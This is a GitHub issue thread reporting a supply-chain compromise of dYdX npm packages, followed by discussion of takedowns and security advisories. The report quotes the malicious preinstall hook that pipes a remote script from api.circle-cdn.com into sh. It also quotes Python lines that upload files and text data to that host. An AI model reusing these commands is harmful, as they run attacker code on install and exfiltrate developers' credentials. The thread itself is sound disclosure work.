dydxprotocol / solo

dYdX V2 Margin Trading Protocol
Apache License 2.0

@dydxprotocol packages download and execute third-party malicious code [malicious takeover] #521

Open mensfeld opened 2 years ago

mensfeld commented 2 years ago

Hey, I'm a security researcher from https://mend.io

This malicious code was found by us at https://Mend.io using our Supply Chain Defender technology.

Looking at the diff here: https://my.diffend.io/npm/@dydxprotocol/solo/0.41.0/0.41.1

A preinstall was added:

    "preinstall": "curl -s http://api.circle-cdn.com/ci.js | sh",

but this script contains code that looks malicious:

    subprocess.getoutput("curl -X POST http://api.circle-cdn.com/uploader.php -F 'uploaded_file=@" + filename2 + "' -F 'submit=Upload'")
    subprocess.getoutput('curl -X POST http://api.circle-cdn.com/api.php -d "textdata=' + allen + '"')

It seems to be stealing credentials and other secrets.

This applies to other packages of the ecosystem as well.

mensfeld commented 2 years ago

OK, the malicious package versions were taken down after my report to npm.

Now let me write a blog post on this with a post-mortem.

louislang commented 2 years ago

The platform we're building triggered on this about 4 hours ago. Was going to reach out to alert you, but glad to see you guys were on top of it. If you need any files/timestamps for the post-mortem, please let me know. Would be happy to help out!

mensfeld commented 2 years ago

@louislang I think I have all the data.

louislang commented 2 years ago

👍 great work on the quick catch!

mensfeld commented 2 years ago

GH issued the advisories per my request:

https://github.com/advisories/GHSA-xjr5-5w2w-3233
https://github.com/advisories/GHSA-42m8-vq85-5486

BrendanChou commented 2 years ago

Thanks all, I have reached out to npm to offer advisories and take down the affected packages. At the time of writing all have been taken down except solo@0.41.1. This looks to be a temporary oversight, as they did remove solo@0.41.2.

mensfeld commented 2 years ago

@BrendanChou any chance of getting info on how effective the attackers were on your side?